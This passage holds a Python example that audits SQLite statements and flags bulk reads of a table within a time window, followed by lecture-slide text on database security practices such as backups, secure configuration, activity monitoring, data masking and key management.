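bulk-read detector over the audit log. All activity is constructed."""
import sqlite3
import time


class AuditLog:
    """Records (timestamp, principal, sql) for every statement SQLite actually runs."""

    def __init__(self, clock=time.time):
        self.entries = []
        self._clock = clock

    def connection_for(self, principal: str) -> sqlite3.Connection:
        """Open a connection whose statements are attributed to `principal`."""
        con = sqlite3.connect(":memory:")
        con.set_trace_callback(lambda sql: self.entries.append((self._clock(), principal, sql)))
        return con


def detect_bulk_reads(entries, table: str, threshold: int, window_seconds: float):
    """Principals that issued more than `threshold` SELECTs touching `table`
    within any sliding window of `window_seconds`."""
    times_by_principal = {}
    for ts, who, sql in entries:
        normalized = " ".join(sql.split()).upper()
        if normalized.startswith("SELECT") and table.upper() in normalized:
            times_by_principal.setdefault(who, []).append(ts)
    flagged = []
    for who, times in times_by_principal.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                flagged.append(who)
                break
    return sorted(flagged)


def run_demo():
    """Constructed activity: bob does one lookup, alice sweeps the table row by row."""
    now = [0.0]
    audit = AuditLog(clock=lambda: now[0])
    alice, bob = audit.connection_for("alice"), audit.connection_for("bob")
    for con in (alice, bob):
        con.execute("CREATE TABLE patients (id INTEGER PRIMARY KEY, name TEXT, diagnosis TEXT)")
    bob.execute("SELECT diagnosis FROM patients WHERE id = ?", (7,)).fetchall()
    for i in range(25):
        now[0] += 1.0
        alice.execute("SELECT name, diagnosis FROM patients WHERE id = ?", (i,)).fetchall()
    flagged = detect_bulk_reads(audit.entries, "patients", threshold=20, window_seconds=60)
    return flagged, audit.entries


if __name__ == "__main__":
    flagged, entries = run_demo()
    print("flagged:", flagged, "statements logged:", len(entries))
```

Production databases expose the same idea as server-side audit logs (with the authenticated user attached by the server); ship those logs off the database host so an attacker with DBA rights cannot quietly edit their own trail.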
Cont’d
 Backup and Recovery:
 Implement regular backup procedures to ensure the
availability and integrity of the database. Backups
should be encrypted, stored securely, and tested for
restoreability. Establish a well-defined recovery
process to minimize downtime and data loss in the
event of a security incident or system failure.
 Secure Configuration:
 Configure the DBMS securely by following best
practices and vendor recommendations. Disable
unnecessary services and features, secure default
accounts and passwords, and implement secure
network configurations to reduce the attack surface.
Cont’d
 Database Activity Monitoring:
 Implement database activity monitoring solutions to
detect and respond to suspicious or malicious
activities in real-time. Database activity monitoring
tools can help identify unauthorized access
attempts, unusual query patterns, or data exfiltration
attempts.
 Data Masking and Redaction:
 Apply data masking and redaction techniques to
protect sensitive data in non-production
environments or when sharing data with external
parties. Data masking replaces sensitive data with
realistic but fictional data, while data redaction
selectively hides sensitive information in query results.
Cont’d
 Database Vulnerability Assessment and Penetration
Testing:
 Conduct regular vulnerability assessments and
penetration testing of the database system to identify
security weaknesses and potential vulnerabilities.
This helps uncover misconfigurations, weak access
controls, and other security issues that could be
exploited by attackers.
 Database Security Training and Awareness:
 Provide training and awareness programs to
database administrators and users to educate them
about database security best practices. This includes
topics such as secure coding practices, data handling
procedures, and incident response protocols.
Cont’d
 Separation of Duties:
 Implement separation of duties by assigning different
responsibilities to different individuals or roles within
the database management process. This helps
prevent unauthorized access and reduces the risk of
insider threats.
 Database Encryption Key Management:
 Implement strong key management practices to
protect encryption keys used to encrypt database
data. This includes secure key storage, rotation, and
access controls to ensure the confidentiality and
integrity of encrypted data.
Summary
 computer security concepts
 threats, attacks, and assets
 hardware, software, data
 intruders
 hackers, criminals, insiders
 malicious software
 Trojan horse, malware
 viruses, worms, and bots
